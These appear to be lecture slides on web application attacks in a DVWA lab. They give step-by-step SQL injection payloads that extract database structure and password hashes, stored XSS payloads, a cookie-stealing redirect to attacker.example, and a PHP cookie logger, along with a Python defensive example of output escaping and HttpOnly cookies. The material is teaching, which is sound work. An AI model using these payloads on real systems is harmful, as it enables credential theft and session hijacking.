Web Applications Attacks A: SQL Injection, Stored Cross Site Scripting. Prof. Reuven Aviv, Department of Computer Science, Tel Hai Academic College. Topics in Data Communications

Contents
1. Hacking Lab Setup
2. SQL Injection Attack
3. Stored Cross Site Scripting Attack
References: Engbretson, The Basics of Hacking and Penetration Testing; Stuttard, The Web Application Hacker's Handbook

Hacking Lab Setup

The Single Machine Penetration Testing Lab (1)
Windows 7 host, running the VMware Player virtualization application
A variety of Linux and Windows XP guest operating systems run on top of VMware:
1. Fedora 14, hosting the DVWA database application (Damn Vulnerable Web Application)
– Applications with well-defined vulnerabilities, designed for studying vulnerabilities and exploits

DVWA: Damn Vulnerable Web Application
– 3 security levels: low, medium, high
– Code compare option

The Single Machine Penetration Testing Lab (2)
2. Backtrack 5 – an Ubuntu-based Linux, enriched with many attacking utilities; designed for testing attacks ("Linux on steroids")
In this lecture Backtrack will usually be the attacker, and the vulnerable web applications will be on Fedora 14/DVWA

Backtrack5

The Single Machine Penetration Testing Lab (2)
3. Windows XP SP2 (unpatched) – has severe vulnerabilities; mostly for testing attacks with the Metasploit Framework
Other guest operating systems – Ubuntu, Ubuntu – usually serve as users, sometimes as victims and sometimes as associates of the attacker

SQL Injection

The dynamics of a web page

1. The user supplies data (via a form element or URL)
2. The browser sends an HTTP request with the data to the web server
3. The web server passes the data to the appropriate application (e.g. a PHP script)
4. The application sends an SQL query, based on the supplied data, to the MySQL Database Management System (DBMS)

The dynamics of a web page
5. The MySQL DBMS interrogates the database, constructs a reply and sends it back to the application
6. The application constructs an HTML page, based on the result, and passes it to the web server
7. The web server sends the HTML page to the browser
8. The browser renders the web page (shows it to the user)
Note: the HTML page might contain client-side scripts (JavaScript); the browser then runs the script, which updates the page, and then displays it

SQL Injection Attack: Basic Idea
If user data is not checked, a malicious user can insert a payload (SQL program code) into its data.
The user data will be sent to the MySQL processor, which will execute it. Replies from the MySQL processor get back to the PHP application.
The reply might:
– Reveal information from the database
– Change the database
– Give control over the OS of the web server
– And more

In this exercise
Attacker: Backtrack5 R1
Victim: Fedora 14, DVWA: user search application – vulnerability: no input check
We will inject code into the MySQL database
We will get information about the structure of the database, such as table contents, user names and MD5-hashed passwords
We will use John the Ripper to crack the passwords

The Search Application window
Insert to the form: 1 – user_id, a number
Output: for all users whose records in the database have (user_id = 1) TRUE, print their first name, last name and their id

Example: Getting the info of the user with ID = 1
The SQL query is: SELECT first_name, Surname FROM users WHERE user_id = '1'
MySQL searches the users table to find a record for which (user_id = 1) is TRUE, and replies with the other two fields in the table: first_name, Surname

The OR ''='' test for vulnerability
Insert to the form: a' OR ''='
The SQL query is: SELECT first_name, Surname FROM users WHERE user_id = 'a' OR ''=''
What will be the result?

The OR ''='' test: Result

The OR ''='' test: explanation
MySQL searches the users table to find records for which (user_id = 'a' OR ''='') is TRUE, and sends back the other two fields in the table: first_name, Surname
The ''='' statement has the value TRUE: empty string on both sides of the equal sign
(user_id = 'a') OR (''='') always has the value TRUE; the value of a is not relevant
All records in the database have the value TRUE for the WHERE clause

Using UNION: Finding the Current MySQL Version
Insert: a' UNION SELECT null,
The query returns two values: an empty string for first_name (due to the null) and the SQL version number in Surname

Using UNION to insert a 2nd SQL Query
The query is: SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT 1,
UNION returns the records of the two SELECT queries one after the other; the number of columns in the second query must match the number in the first query (here 2), otherwise error.
– Field titles (first name, surname) are from the 1st query
1st SELECT provides no results
2nd SELECT has (arbitrary) null as its first item; the second item is the database version

Finding the name of the database and the location of the database files
Insert: ' UNION SELECT database(),
Result:
1st SELECT provides no results
2nd SELECT: first_name (database name): dvwa; Surname (directory of files in the operating system): /var/lib/mysql/

Getting the database user
Insert: a' AND 1=0 UNION SELECT null, user() #
user() returns the name of the remote user that runs the SQL process; that determines its privileges. In this case it is root

Find all table names
Insert: a' AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables; #
The information_schema contains the meta-data of the database: table names, column names, privilege tables, etc. Here we want the names of all the tables; for each we want the table_name and the database it belongs to (the table_schema)

List of tables and their 'databases'
Databases: information_schema, dvwa, mysql

Find all tables that start with 'user'
Insert to the form: a' AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_name LIKE 'user%' #

Tables that start with 'user'
– user_privileges (information_schema database)
– users (dvwa database)
– user (mysql database)

Find the columns of table dvwa:users
Insert: a' AND 1=0 UNION SELECT concat_ws(':', table_schema, table_name), column_name FROM information_schema.columns WHERE table_name = 'users' #
concat_ws(separator, value1, value2, …) concatenates string values, with the separator, into one string (used here because we can get only 2 values)

Column names of table dvwa:users: user_id, first_name, last_name, user, password, avatar

Find the contents of the dvwa:users table
Insert to the form: a' AND 1=0 UNION SELECT concat_ws(':', first_name, last_name), concat_ws(':', user, password) FROM users; #

Contents of the dvwa:users table: the second field is username:password

Collect the user:password values into the file dvwa_passwd.txt

Cracking the passwords using John the Ripper
Here we assume that the passwords are kept as MD5 hashes

Stored Cross Site Scripting Attack

Mechanism of Stored Cross Site Scripting Attacks
One user (the hacker) attacks an unsuspecting user who accesses the same vulnerable web page
The attacker inserts a script (instead of a string) that is stored on the server (usually in a database)
The script is downloaded to the victim's browser whenever it accesses the same application

Stored Cross Site Scripting Attack example
Application: guest book
– A user visits a web page and writes a message
– Messages are stored in a backend database
– Whenever a user (victim) accesses the guestbook, all previous messages are downloaded to that user's browser
A malicious user (the attacker) could insert a JavaScript message (also called a payload)
When the payload is downloaded to a victim user's browser, it executes and does bad things – connects to a malicious website, steals cookies, ...

This exercise: Attacking other users
Attacker: Backtrack5 R1
Vulnerable application on the Fedora 14/DVWA web server: stored cross site scripting (a guest book application) – the vulnerability: user input is not checked or filtered
Victims: other users using the same application
We will exploit the vulnerability to attack other users using the same application – inject code, direct them to other websites, steal cookies

User abi accesses the vulnerable application (Guestbook) page and writes a message
User info: Name, Message

Result: the previous initial messages and abi's message are downloaded to abi's browser

Now John (attacker) inserts a script
Insert (a JavaScript): Hi all alert("Alert from John")
This will serve as a test of whether the application checks its data

The script is executed on John's browser
The application sends the script to the browser, which executes it
The test is successful: the application does not check, filter or sanitize the user input

Inserting a foreign page into the web browser of the victim
Insert in the message field: (an iframe element)
iframe embeds another document inline in the web page; here, the CNN home page

Embedding an inline document: this could be any malicious website

Inserting another foreign page
Insert in the message field: HI GUYS GO TO THE Secmaniac WEBSITE HOME OF THE SOCIAL ENGINEER TOOLKIT (SET)

The user gets a surprise new frame

Cookie Stealing: Attempt 1 (failed)
The victim logs in to the DVWA website and gets a cookie.
The attacker sends to the victim, and persuades the victim to click on, this "interesting (attacker's) site"
The victim clicks and is redirected to that attacker's site
The attacker site's HTTP response contains a malicious script that commands the browser to send him the cookie generated by another (the DVWA) site.
But a browser is allowed to send the cookie only if the commanding JavaScript came from the same site that originally created the cookie (Same Origin Policy)
We need to send the script from the DVWA application

Cookie Stealing: Attempt 2
The attacker installs a script in the DVWA application, which is downloaded to a victim user. The script has a link. By clicking on it, the victim's browser sends a GET request to load another page (from the attacker's website).
Since the script came from the DVWA application, trusted by the victim's browser, the cookie (previously received from the DVWA application) is automatically sent in this GET packet.
The HTTP request is received and processed by a CookieStealer.php script on the attacker's website.

Redirect users to a cookie-stealing page
Insert the message: a very interesting site CookieStealer.php;
The address above is that of the attacker website
The CookieStealer.php script copies the cookie of whoever accesses the script

The user's message has a link
Other users will see the link ("a very interesting site"); they might be tempted to click on it

The link reappears every time a user sends a message
Another user accessed the guestbook; this new user clicks on the link…

The user was redirected to the malicious site

A direct method for stealing the user's cookie
Insert into the message field: document.location=' Stealer.php?cookie='+document.cookie;
CookieStealer.php gets the value of the cookie parameter, which holds the cookie associated with the current web page; the value is stored in the browser's host in the document.cookie property
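Two points from the guestbook slides and the cookie-stealing slides deserve a worked counterpart, so the Python example below is added here; it is not part of the lecture or of DVWA. First, the guestbook is exploitable because stored messages are pasted into the page unchanged; escaping each untrusted value at the moment it is placed into HTML turns John's script into inert text, and the example renders constructed guestbook entries both ways. Second, the reason the direct method reads document.cookie from inside the DVWA page is that a browser sends a site's cookie only to that site, never to the attacker's host; marking the session cookie HttpOnly removes it from document.cookie, so even a script that does run on the page cannot read it. The entries, the cookie name sessionid and the host name attacker.example are all made up for this example.

```python
import html

# Constructed guestbook entries: abi's ordinary message, then the kind of payloads the
# slides' attacker (John) stores. The host attacker.example is a placeholder.
SAMPLE_ENTRIES = [
    ("abi", "Hello from abi"),
    ("John", 'Hi all <script>alert("Alert from John")</script>'),
    ("John", '<script>document.location="http://attacker.example/CookieStealer.php'
             '?cookie="+document.cookie;</script>'),
]

ROW_TEMPLATE = "<p><b>{name}</b>: {message}</p>"


def render_vulnerable(entries):
    """What the low-level guestbook does: stored strings are pasted into the page
    unchanged, so tags inside a message become markup that the next visitor's browser
    parses and, for <script>, executes."""
    return "\n".join(ROW_TEMPLATE.format(name=n, message=m) for n, m in entries)


def render_escaped(entries):
    """Output encoding at the point of use: every untrusted value is HTML-escaped as it
    is placed into the page, so <, >, &, " and ' become entities and the browser shows
    the payload as literal text instead of running it."""
    return "\n".join(
        ROW_TEMPLATE.format(name=html.escape(n, quote=True),
                            message=html.escape(m, quote=True))
        for n, m in entries
    )


def has_script_tag(page):
    """Helper for checking a rendered page: is there still a live <script> tag?"""
    return "<script" in page.lower()


def session_cookie_header(session_id):
    """Response header for the session cookie (cookie name is made up). HttpOnly keeps
    the value out of document.cookie, so an injected script cannot read it; Secure and
    SameSite restrict where the browser will send it."""
    return ("Set-Cookie: sessionid=%s; Path=/; HttpOnly; Secure; SameSite=Lax"
            % session_id)


if __name__ == "__main__":
    print("--- pasted in unchanged (the slides' guestbook) ---")
    print(render_vulnerable(SAMPLE_ENTRIES))
    print("--- HTML-escaped on output ---")
    print(render_escaped(SAMPLE_ENTRIES))
    print(session_cookie_header("constructed-session-id"))
```

Escaping must happen where the value lands in HTML (here the message body of a paragraph); a value placed inside an attribute or a script block needs the encoding for that context, and HttpOnly does not stop the injected script from doing anything else on the page, such as the iframe and redirect examples above.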

The response from the Attacker’s CookieStealer.php Application

A new user (Ubuntu) logs in to the DVWA web application

The Ubuntu user clicks on the Stored XSS application (the guestbook application)

The new user is redirected to the attacker website
As soon as the new user accesses the application for the first time, the script is downloaded to his browser, and he is redirected to the malicious (or faked) attacker's website

Collecting the cookies of the victims
On the attacker host (Backtrack), at /var/www:
– the CookieStealer.php application
– the log.txt file, which contains the cookies of the victims

A simple cookiestealer.php
Cookie Stealer
<?php
$cookie = $_GET['cookie'];      // the cookie value arrives as a URL query parameter
$log = fopen("log.txt", "a");   // open the log file for appending
fwrite($log, $cookie . "\n");   // one cookie per line
fclose($log);
echo 'You have been hacked. You are now visiting MY WEBSITE I am now copying your DVWA cookie Your attacker Please click here to go back to the DVWA website ';
?>